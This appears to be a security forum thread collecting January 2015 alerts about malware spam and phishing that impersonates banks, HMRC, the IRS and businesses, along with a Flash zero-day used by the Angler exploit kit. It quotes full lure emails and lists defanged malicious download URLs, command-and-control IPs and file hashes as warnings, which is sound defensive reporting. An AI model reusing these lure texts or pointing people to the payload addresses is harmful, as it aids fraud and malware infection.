- http://threattrack.tumblr.com/post/108560007998/lockheedmartin-fax-spam
Jan 19, 2015 - "Subjects Seen:
[Lockheed Martin UK Ltd Integrated Systems] New fax message - LFQ.71021C670.3249
Typical e-mail details:
FAX: +07755-090107
Date: 2015.01.18 17:33:18 CST
Pages: 4
Reference number: LFQ.71021C670.3249
Filename: curbed.zip

Lockheed Martin UK Ltd Integrated Systems Michaele Vivas

Malicious URLs:
breteau-photographe .com/tmp/pack.tar.gz
voigt-its .de/fit/pack.tar.gz
maisondessources .com/assets/pack.tar.gz
pleiade.asso .fr/piwigotest/pack.tar.gz
scolapedia .org/histoiredesarts/pack.tar.gz
Malicious File Name and MD5:
curbed .scr (BDFE7EB4A421B9A989C85BFFF7BACE2C)
1715030703 .exe (4ebd076047a04290f23f02d6ecd16fee)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/93353be3c5a5dd804da246f3da7ec037/tumblr_inline_nifqztQaEr1r6pupn.png

Tagged: LockHeedMartin, Citroni, dalexis
___

Fake 'Natwest' SPAM - leads to malware
- http://blog.dynamoo.com/2015/01/malware-spam-natwest.html
19 Jan 2015 - "This spam claiming to be from NatWest bank (or is it nEtwest?) leads to malware.
From: NatWest [donotreply@ netwest .uk]
Date: 19 January 2015 at 14:02
Subject: Important - Please complete attached form ...
Dear Customer
Please find below your Banking Form for Bankline.
<URL redacted>
Please complete Bankline Banking Form :
- Your Customer Id and User Id - which are available from your administrator if you have not already received them
Additionally, if you wish to access Bankline training, simply follow the link below
<URL redacted>
If you have any queries or concerns, please telephone your Electronic Banking Help Desk.
National Westminster Bank Plc, Registered in England No. 929027. Registered Office: 135 Bishopsgate, London EC2M 3UR.
Authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority...

In this case the link in the email goes to www .ipawclp .com/NEW-IMPORTANT-NATWEST_FORM/new.bankline_document .html where it hits a couple of scripts at:
http ://restaurantratiobeach .ro/js/jquery-1.39.15.js
http ://utokatalin .ro/js/jquery-1.39.15.js
In turn, that leads to a ZIP file download which contains an EXE file which is slightly different each time it downloads, with low detection rates in all cases [1] [2] [3]. The name of the ZIP file and EXE varies, but is in the format doc12345.exe and doc54321.zip. Of note is a sort-of-informational screen on the download page:
> https://2.bp.blogspot.com/-BbZFLI01zzE/VL0eAGDsU8I/AAAAAAAAGIQ/MlAa94-Kmlc/s1600/fake-natwest.png
Automated analysis is presently inconclusive...
UPDATE:
@snxperxero suggests blocking the following sites:
202.153.35.133
loveshopclothing .com
credit490 .com "
1] https://www.virustotal.com/en/file/22599e7a2aa4c5d047fe075a7dec1e8aba4945dc08b79137571175d1703b0d70/analysis/1421678510/

2] https://www.virustotal.com/en/file/c955cefd43d594af4f36a5442878498e446ac80d63810b5052e852ea46a99d57/analysis/1421678516/

3] https://www.virustotal.com/en/file/76c76752649a6241f28d3134df5069c58296d3888a9bac17c6b4ccec843658fb/analysis/1421678522/
___

Fake 'Insurance Inspection' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html
19 Jan 2015 - "This spam does -not- come from FMG Support Group Ltd, but instead it is a forgery. FMG are -not- sending out the spam, nor have their systems been compromised in any way. Instead, this spam has a malicious Word document attached.
From: repairermessages@ fmg .co.uk
Date: 19 January 2015 at 07:24
Subject: Insurance Inspection Arranged AIG02377973
FMG is committed to reducing its impact on the environment. Please don't print this email unless absolutely necessary.
Have you been impressed by one of our people?
If so, we'd love to hear about it. You can nominate someone for a Spirit award by emailing spirit@ fmg .co.uk
FMG Support Group Ltd. Registered in England. No. 06489429.
Registered office: FMG House, St Andrews Road, Huddersfield, HD1 6NA.
Tel: 0844 243 8888 ...

Attached is a Word document AIG02377973-InsuranceInspectionArranged.doc which comes in at least -two- different versions, neither of which are detected by AV vendors [1] [2]. These documents contain -two- slightly different malicious macros... which attempt to download a further component from:
http ://chilan .ca/js/bin.exe
http ://techno-kar .ru/js/bin.exe
This is saved as %TEMP%\324234234.exe which has a VirusTotal detection rate of 2/57*. The Malwr report shows it attempting to communicate with the following IPs:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These two IP addresses have been used by this -malware- for a long time, I strongly recommend you block them. Also, a malicious DLL is dropped on the infected system with a detection rate of just 2/53**."
1] https://www.virustotal.com/en/file/2ba965fec6d3f369b617ec192376feb53673577af88fb218dd15dc33069384bb/analysis/1421656771/

2] https://www.virustotal.com/en/file/5afe6253b435668f7fb449bd75a53532f9237e738f4bbc83c511bdbd4df81fab/analysis/1421657737/
___

Fake '19TH JANUARY 2015.doc' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-traci-wilson.html
19 Jan 2015 - "This rather terse spam does -not- actually come from Davies Crane Hire, but it is a -forgery- with a malicious Word document attached. Davies Crane Hire have not been hacked or compromised, and they are -not- sending out this spam.
From: Traci Wilson [t.wilson@ daviescranehire .co.uk]
Date: 19 January 2015 at 09:05
Subject: 19TH JANUARY 2015.doc

There is -no- body text, just an attachment called 19TH JANUARY 2015.doc which contains a malicious macro.
The documents in use and the payload are identical to this spam run* that proceeded it. At the moment, everything has a very low detection rate. The payload is the Dridex banking trojan."
* http://blog.dynamoo.com/2015/01/malware-spam-repairermessagesfmgcouk.html

- http://myonlinesecurity.co.uk/traci-wilson-daviescranehire-co-uk-19th-january-2015-xlsx-word-doc-malware/
19 Jan 2015
___

Fake 'tax refund' Phish...
- http://myonlinesecurity.co.uk/hm-revenue-customs-received-tax-refund-payment-phishing/
19 Jan 2015 - "'HM Revenue and Customs – You have received a tax refund payment !' is an email pretending to come from HM Revenue & Customs <tax@ hmrc .gov .uk> . One of the major common subjects in a phishing attempt is -Tax returns- where especially in the UK, you need to submit your Tax Return online before 31st December each year. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... If you follow the link you see a webpage looking like this where they want your email address and name:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish1.png
They then pretend to do a search based on your name and email. Then you get sent on to the nitty gritty where they want -all- your banking and credit information:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/spiderspun_HMRC_phish2.png
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

:fear: :mad:

AplusWebMaster
2015-01-20, 14:43
FYI...

Fake 'Proforma Invoice' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html
20 Jan 2015 - "This -fake- invoice leads to malware. It is not being sent by Big K Products UK Ltd, their systems have not been hacked or compromised. Instead, the email is a -forgery- designed to get you to click the malicious attachment.
From: Monika [monika.goetz@ bigk .co.uk]
Date: 20 January 2015 at 07:18
Subject: Proforma Invoice
Please find enclosed the proforma invoice for your order. Please let me know when payment has been made, so that the goods can be despatched.
Kind regards,
Monika Goetz
Sales & Marketing Co-ordinator

The document attached is Proforma.doc which is currently undetected by AV vendors. It contains a malicious macro... which attempts to download a binary from:
http ://solutronixfze .com/js/bin.exe
..which is saved to %TEMP%\324234234.exe. This has a VirusTotal detection rate of 2/56* and the Malwr report shows it attempting to phone home to:
59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)
These IPs have been used many times in similar recent attacks an I recommend you block them. It also drops a DLL with a VirusTotal detection rate of 2/57**. The payload appears to be the Dridex banking trojan. See also this post*** about a related spam run also in progress this morning."
* https://www.virustotal.com/en/file/0dd553a3e401941a044412406dee6c83fc193bb5c5d19140c61a11aa0e346503/analysis/1421744001/

** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421744963/

*** http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html

- http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/
20 Jan 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Big-K-proforma-invoice.png

> https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/
___

Fake 'Barclays Online Bank [security-update]' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-barclays-important-update.html
20 Jan 2015 - "This -fake- Barclays spam leads to malware.
From: Barclays Online Bank [security-update@ barclays .com]
Date: 20 January 2015 at 14:41
Subject: Barclays - Important Update, read carefully!
Dear Customer,
Protecting the privacy of your online banking access and personal information are our primary concern.
During the last complains because of online fraud we were forced to upgrade our security measures.
We believe that Invention of security measures is the best way to beat online fraud.
Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.
For security reasons we downloaded the Update Form to security Barclays webserver.
You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.
- Please download and complete the form with the requested details: <URL redacted>
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)
Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.
Thank you for your patience as we work together to protect your account.
Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.
Sincerely,
Barclays Online Bank Customer Service
We apologize for any inconvenience this may have caused...

The link in the email varies, some other examples seen are:
http ://nrjchat .org/ONLINE~IMPORTANT-UPDATE/last-update.html
http ://utokatalin .ro/ONLINE-BANKING_IMPORTANT/update.html
http ://cab .gov .ph/ONLINE-IMPORTANT~UPDATE/last~update.html
Visiting these sites goes through some javascript hoops, and then leads to a ZIP file download which contains a malicious EXE that changes every time it is downloaded. The files are named in the general format update12345.zip and update54321.exe.
The file itself is an Upatre downloader, with poor detection rates [1] [2] [3].
The Malwr report shows traffic to the following URLs:
http ://202.153.35.133 :33384/2001uk11/HOME/0/51-SP3/0/
http ://202.153.35.133 :33384/2001uk11/HOME/1/0/0/
http ://clicherfort .com/mandoc/eula012.pdf
http ://202.153.35.133 :33387/2001uk11/HOME/41/7/4/
http ://essextwp .org/mandoc/ml1from1.tar
Out of these 202.153.35.133 (Excell Media Pvt Ltd, India) is one you should definitely block. This downloader drops several files including (in this case) %TEMP%\sJFcN24.exe which has a VirusTotal detection rate of just 3/57* and is identified as Dyreza.C by Norman anti-virus."
1] https://www.virustotal.com/en/file/dc887426e0b4c62b8c33fe9b7e549a0b86a54a44c65088ac8726755259962571/analysis/1421768747/

2] https://www.virustotal.com/en/file/e08439b97ceba3e38852ed22df7b402837305b3f973cd134f8d1d90a6a8d4377/analysis/1421768757/

3] https://www.virustotal.com/en/file/0c0e38af5c842905e74fc361ee6c33e0a3a3ebdd3d342f8acb601e0c21c89349/analysis/1421768766/

* https://www.virustotal.com/en/file/ebf8570dfc744a3a1b14cc2b04f2cd2c4c5271403a42bdd77b8b743be27d89c4/analysis/1421770305/

202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/

- http://myonlinesecurity.co.uk/barclays-important-update-read-carefully-fake-pdf-malware-2/
20 Jan 2015
* https://www.virustotal.com/en/file/ad7a94f2091cee47b6406f4e1db03c57b537fab9707551f27e2b6cf541faf6ca/analysis/1421769761/

- http://threattrack.tumblr.com/post/108646232563/barclays-important-update-spam
Jan 20, 2015
Tagged: Barclays, Upatre
___

Fake 'Delivery Confirmation' SPAM – doc malware
- http://myonlinesecurity.co.uk/mereway-kitchens-delivery-confirmation-word-doc-malware/
20 Jan 2015 - "'mereway kitchens Delivery Confirmation' pretending to come from mereway kitchens <sales.north@ mereway .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... 2 versions of this spreading today. In one version once again the body of the email is completely -blank- ... and the malware is the same as today’s version of Proforma Invoice Monika big K – Word doc malware*. The second version also having the same malware just simply says 'Delivery Confirmation'..."
* http://myonlinesecurity.co.uk/proforma-invoice-monika-big-k-word-doc-malware/

- http://blog.dynamoo.com/2015/01/this-rather-terse-spam-comes-with.html
20 Jan 2015
1] https://www.virustotal.com/en/file/3cf6a0c90dad3b16422ed543195abf09a70b660c15fbab956eba1855024fcfbb/analysis/1421745692/

2] https://www.virustotal.com/en/file/f76bdf44089a2f81115e5f6b933b1c9966b7fb358b80c0cf532a72acf9fe46d0/analysis/1421746148/
___

Fake 'Undefined transactions' SPAM - macro malware
- http://blog.dynamoo.com/2015/01/malware-spam-undefined-transactions.html
20 Jan 2015 - "This spam comes in a few different variants, however the body text always seems to be the same:
From: Joyce Mills
Date: 20 January 2015 at 10:30
Subject: Undefined transactions (need assistance) Ref:1647827ZM
Good morning
I have recently found several payments on statement with the incorrect reference. Amounts appear to be from your company, could you please confirm these payments are yours and were made from your company's bank account. If no then please reply me as soon as possible. Thanks.
P.S. Undefined transactions are included in the attached DOC.
Regards,
Joyce Mills
Senior Accounts Payable
PAYPOINT

The reference number is randomly generated and changes in each case, attached is a malicious Word document also containing the same reference number (e.g. 1647827ZM.doc). Also the name in the "From" field is consistent with the name on the bottom of the email, although this too seems randomly generated... I have seen two different variants of Word document in circulation, both undetected by AV vendors [1] [2] and each one contains a slightly different malicious macro... which attempt to download from the following locations:
http ://189.79.63.16 :8080/koh/mui.php
http ://203.155.18.87 :8080/koh/mui.php
This file is downloaded as 20.exe and is then copied to %TEMP%\324234234.exe. It has a VirusTotal detection rate of 2/57*. That report indicates that it attempts to phone home to:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
This IP is commonly used in this type of attack, I would strongly recommend you block it. The Malwr report shows that this drops a Dridex DLL with a VirusTotal detection rate of 2/57**, which is the same DLL as seen earlier today***."
1] https://www.virustotal.com/en/file/5d2500d1e1776adffe161bae934af1e52389d6134a3d14ce8d638fb6d6185fd2/analysis/1421750540/

2] https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421750559/

* https://www.virustotal.com/en/file/b6d46cfd60db1e9edef1077d908f075f3dc4ca2b0161f40ca02e0b50d468809a/analysis/1421750847/

** https://www.virustotal.com/en/file/447628439e2e53806ff3c6e76d3ececea50ab5607b3ace9c75fd2248aaad0a09/analysis/1421752892/

*** http://blog.dynamoo.com/2015/01/malware-spam-monika-monikagoetzbigkcouk.html


- http://myonlinesecurity.co.uk/undefined-transactions-need-assistance-ref50236lv-word-doc-malware/
20 Jan 2015
* https://www.virustotal.com/en/file/9f2eea012d0370b0a8051255e53bfd386b7bec32e92ea6a51e29b68b83739765/analysis/1421749886/
___

Fake 'IRS' SPAM - doc malware
- http://myonlinesecurity.co.uk/internal-revenue-service-complaint-company-word-doc-malware/
20 Jan 2015 - "'Complaint against your company' pretending to come from Internal Revenue Service <complaints@irs.gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
Dear business owner,
A criminal complaint has been filled against your company.
Your company is being accused of trying to commit tax evasion schemes.
The full text of the complaint file ( .DOC type ) can be viewed in your
Microsoft Word, complaint is attached.
AN official response from your part is required, in order to take further
action.
Please review the charges brought forward in the complaint file, and
contact us as soon as possible by :
Telephone Assistance for Businesses: Toll-Free, 1-800-829-4933
Email: complaints@ irs .gov
Thank you,
Internal Revenue Service Fraud Prevention Department

20 January 2015 : complaint20150119.doc - Current Virus total detections: 22/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d04079c569863276bf4a135096b68fbafc6bb2679ac10b41b4af40f30d6fbb12/analysis/1421772306/
___

Fake 'Bank of Canada' SPAM – PDF malware
- http://myonlinesecurity.co.uk/national-bank-canada-notice-payment-fake-pdf-malware/
20 Jan 2015 - "'National Bank of Canada Notice of payment pretending to come from sac.sbi@ sibn .bnc .ca with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You can view and print the notice of payment using the Netscape or
Microsoft Explorer browsers, versions 6.2 and 5.5. You can export and store the
notice of payment data in your spreadsheet by choosing the attached file in
pdf format “.pdf”.
If you have received this document by mistake, please advise us immediately
and return it to us at the following E-mail address:
“sac.sbi@ sibn .bnc .ca”.
Thank you.
National Bank of Canada
600 de La Gauchetire West, 13th Floor
Montreal, Quebec H3B 4L2 ...

20 January 2015: payment_notice.zip: Extracts to: payment_notice.scr
Current Virus total detections: 13/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1c6bf03d178cc1c5dd101e3bcd5fdf8f56bd2c1e8217e3713ffe6a861b1d33b6/analysis/1421783533/

:fear: :mad:

AplusWebMaster
2015-01-21, 15:23
FYI...

Fake 'Open24 Service update' Phish ...
- http://myonlinesecurity.co.uk/open24-permanent-tsb-service-update-phishing/
21 Jan 2015 - "'Open24 Permanent TSB Service update' pretending to come from Open24 <serviceupdates@ gol .net .gy> is one of the latest -phish- attempts to steal your Open24.ie ( Permanent TSB) Bank, credit card and personal details. This one only wants your personal details, your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email:
Fwd: Software Upgrade
Dear Open24 Customer,
In order to help us protect our main line of defense against intruders; you will need to update your account through our secured server, in line to safe internet banking regulatory Requirements.
To proceed, simply follow the link below:
service_update
Kind regards
Open24

> Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish1.png
When you fill in your user name and password you get sent on to a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format then you are sent to the genuine open24.ie ( permanent TSB ) bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/open24_phish2-1024x659.png
All of these emails use Social engineering tricks to persuade you to open the attachments (or click-the-link) that come with the email..."
___

Fake inTuit QuickBooks Phish
- https://security.intuit.com/alert.php?a=119
1/19/2015 - "People are receiving -fake- emails with the title "Profile Update". These mails are coming from turbotax_infoo01@ grr .la, which is -not- a legitimate email address. Below is a copy of the email people are receiving:
> https://security.intuit.com/images/profileupdatephish.jpg

This is the end of the -fake- email.
Steps to Take Now:
- Do -not- open the attachment in the email...
- Do not forward the email to anyone else.
- Delete the email."
___

Flash 0-Day Exploit used by Angler Exploit Kit
- https://isc.sans.edu/diary.html?storyid=19213
2015-01-21 - "The "Angler" exploit kit is a tool frequently used in drive-by download attacks to probe the browser for different vulnerabilities, and then exploit them to install malware. The exploit kit is very flexible and new exploits are added to it constantly. However, the blog post below* shows how this exploit kit is currently using an unpatched Flash 0-day to install malware. Current versions of Windows (e.g. Window 8 + IE 10) appear to be vulnerable. Windows 8.1, or Google Chrome do not appear to be vulnerable... typically we see these exploits more in targeted attacks, not in widely used exploit kits. This flaw could affect a large number of users very quickly..."
* http://malware.dontneedcoffee.com/2015/01/unpatched-vulnerability-0day-in-flash.html
2015-01-21 - "... Angler EK exploiting last version (16.0.0.257) of Flash..."
Update: "... tested it against the free version of Malwarebytes Anti Exploit* (a product from one of my customers). That stopped it. Well done!..."
* https://www.malwarebytes.org/antiexploit/

- http://blog.trendmicro.com/trendlabs-security-intelligence/flash-greets-2015-with-new-zero-day/
Jan 22, 2015 - "... Chrome’s version of the Flash Player plugin is sandboxed, mitigating potential effects to end users. Firefox is also immune to this threat..."
Geographic distribution of users affected by Angler
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/Geographic-Distribution-of-Users-Affected-by-Angler-01.jpg

:fear: :mad:

AplusWebMaster
2015-01-22, 16:12
FYI...

Fake 'HMRC Application' SPAM – PDF malware
- http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware-2/
22 Jan 2015 - "'HMRC Application – [ your domain name]' pretending to come from HMRC .gov .uk <application@ hmrc .gov .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This template was used in a malware run back in July 2014 and gets periodically reused HMRC Application – fake PDF malware*...
* http://myonlinesecurity.co.uk/hmrc-application-fake-pdf-malware/
The email looks like:
Please print this information, sign and send to application@ hmrc .gov .uk.
Date Created: 22 January 2015
Business name: ...
Acknowledgement reference: 3213476
VAT Registration Number is 3213476.
Repayment of Input Tax
Before the business starts to make taxable supplies they may provisionally claim repayment of VAT they are charged as input tax. The general rules about VAT, including Input Tax, Partial Exemption, are explained in VAT Notices 700 and 706, available on the HMRC website
Repayment of VAT as input tax is subject to the condition, provided for by the Value Added Tax Act 1994, Section 25(6), that HMRC may require them to refund some or all of the input tax they have claimed, if they do not make taxable supplies by way of business, or the input tax they claimed prior to a period in which they make taxable supplies in the course of business does not relate to the taxable supplies they make.
Change of Circumstances
If your client no longer intends to make taxable supplies, or there is any other change of circumstances affecting their VAT registration (including any delay in starting to make taxable supplies), they must notify HMRC within 30 days of the change.
If the application included an enquiry about:
the Flat Rate Scheme
the Annual Accounting Scheme
an Economic Operator Registration and Identification (EORI) number
HMRC will send your client more information about this separately
What next?
Your client will receive their Certificate of Registration (VAT4) in the post in due course.
Your client can find general information about VAT and a guide to record keeping requirements by following one of the links below...

22 January 2015: Application_3213476.zip (15 kb): Extracts to: Application_891724.pdf.exe
Current Virus total detections: 2/56** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
** https://www.virustotal.com/en/file/a38511049249886b981a5a6221008a867e5199b5961106a3cec29badd523dd94/analysis/1421924288/
___

Fake 'Tesco Bank Fix' – Phish ...
- http://myonlinesecurity.co.uk/tesco-bank-fix-error-account-phishing/
22 Jan 2015 - "'Tesco Bank Fix The Error On Your Account' pretending to come from Tesco .com <info@ thf .com> warning of errors on your account is one of the latest phish attempts to steal your Tesco bank Account and your other personal details. This one wants your personal details, Tesco log in details and your credit card and bank details... -don’t- click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is fake. Some versions of this phish will ask you fill in the html ( webpage) form that comes attached to the email:
Dear Customer:
You have an incoming payment slated for your account. This transaction cannot be
completed due to errors present in your account information.
You are required to click on the Logon below to fix this problem immediately.
LOG ON
Please do not reply to this message. For questions, please call Customer Service at the
number on the back of your card. We are available 24 hours a day, 7 days a week.
Regards,
Tesco Personal Finance.

If you follow the link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1-1024x606.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

Fake (more) MyFax malware SPAM
- http://blog.dynamoo.com/2015/01/yet-more-myfax-malware-spam.html
22 Jan 2015 - "There's another batch of "MyFax" spam going around at the moment, for example:
From: MyFax [no-replay@ my-fax .com]
Date: 22 January 2015 at 15:08
Subject: Fax #4356342
Fax message
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
Sent date: Thu, 22 Jan 2015 15:08:30 +0000

Clicking the link [don't] leads to a page like this:
> http://1.bp.blogspot.com/-k2m-UrYJxyA/VMEkOU_xYXI/AAAAAAAAGKc/POCVv8uPOwg/s1600/upatre.png
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http ://202.153.35.133 :51025/2201us22/HOME/0/51-SP3/0/
http ://202.153.35.133 :51025/2201us22/HOME/1/0/0/
http ://when-to-change-oil .com/mandoc/story_su22.pdf
http ://202.153.35.133 :51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to -block- traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48*.
I haven't seen a huge number of these, the format of the URLs looks something like this:
http ://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http ://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http ://[redacted]/_~NEW.FAX.MESSAGES/incoming.html "
1] https://www.virustotal.com/en/file/eaedc6884264fd9e5afd6ebc754bc7ad1ff6e5670e49536bcf5b949864515617/analysis/1421943275/

2] https://www.virustotal.com/en/file/ddaf8767671337047a98934b34c1f90f17078516887cbb4116355295ac670adb/analysis/1421943304/

3] https://www.virustotal.com/en/file/3d99b919a29563e3cf86e2577c85202127c3f4372538d0d3d0830f9199a39d32/analysis/1421943319/

* https://www.virustotal.com/en/file/7cea9e6d5c8a1484f3928ad2e946471799872e07ef70cb8ee0ea16d1ab502d40/analysis/1421944232/

- http://myonlinesecurity.co.uk/myfax-fax-5717718-fake-pdf-malware/
22 Jan 2015
* https://www.virustotal.com/en/file/b7ddbecb37df4b1aef2de5f8defaa44ad41ef534714310ab33a9ecc74e504681/analysis/1421940393/
___

Fake 'voice mail' SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-voice-mail-fake-pdf-malware/
22 Jan 2015 - "'You have received a voice mail' pretending to come from Voice Mail <no-reply@ voicemail-delivery .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE 837-676-8958.wav (29 KB)
Caller-Id: 837-676-8958
Message-Id: KIUB4Y
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

22 January 2015 : VOICE837-676-8958.zip (209 kb): Extracts to: VOICE8419-283-481.scr
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e855d451a62df108cd81c8bc350d24c60cad32981db4d8df08937804be5ddde0/analysis/1421943742/
0003_.b64.zip-1.exe

:fear: :mad:

AplusWebMaster
2015-01-23, 15:17
FYI...

Fake 'tax return incorrect' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-2014-tax-payment-issue.html
23 Jan 2015 - "This tax-themed spam has a malicious Word document attached. It appears to come in several variants, for example:
From: Quinton
Date: 23 January 2015 at 08:18
Subject: 2014 Tax payment issue
According to your tax payments for 2014 year period we found that you gave a wrong legal address in your last tax payment. In order to avoid penalty fees on your tax dues we ask you to contact our specialist having checked the previous payment in advance (the DOC invoice attached below).
Regards
Quinton
Tax Inspector

From: Tara Morris
Date: 23 January 2015 at 09:28
Subject: Your tax return was incorrectly filled out
Attention: Accountant
This is to inform you that your legal address was filled incorrectly while completing the last tax form application for 2014 year.
In order to avoid penalty fees during the next tax period please contact our expert as soon as you check the payment details (the DOC invoice attached below).

Attached is a Word document with a random name, but always starting with "TAX_". Examples include:
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither are detected by AV vendors [1] [2] containing one of two malicious macros... that download a file 20.exe from the following URLs:
http ://37.139.47.221 :8080/koh/mui.php
http ://95.163.121.82 :8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending."
1] https://www.virustotal.com/en/file/5d93d9f0368d6b0ff5881864b7c9792bdde482f8b79d6ade44d6c878f58897c4/analysis/1422005666/

2] https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422005678/

37.139.47.221: https://www.virustotal.com/en/ip-address/37.139.47.221/information/

95.163.121.82: https://www.virustotal.com/en/ip-address/95.163.121.82/information/


- http://myonlinesecurity.co.uk/tax-return-incorrectly-filled-word-doc-malware/
23 Jan 2015
> https://www.virustotal.com/en/file/c3e9b61d47ea0337c391686aedb5b6654c3ae38043b0a34414a5cd3cc069bf62/analysis/1422004558/
TAX_38156WHH.doc
> https://www.virustotal.com/en/file/3d1acc20c90088cf164863343dd3bca558a45bb0e386923e26b88ed571e991e8/analysis/1422007893/
23.01.15_3406ICZ.xls
___

Fake 'Danske Bank' SPAM – PDF malware
- http://myonlinesecurity.co.uk/danske-bank-potentially-fraudulent-transaction-fake-pdf-malware-2/
23 Jan 2015 - "'Danske Bank – Potentially fraudulent transaction' pretending to come from Dee Hicks – Danske Bank <Dee.Hicks@ danskebank .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We are contacting you regarding a potentially fraudulent transaction on your account.
Please check attached file for more information about this specific transaction.
Dee Hicks
Senior Account Executive
Danske Bank
Dee.Hicks@ danskebank .com
Tel. +45 33 44 46 77
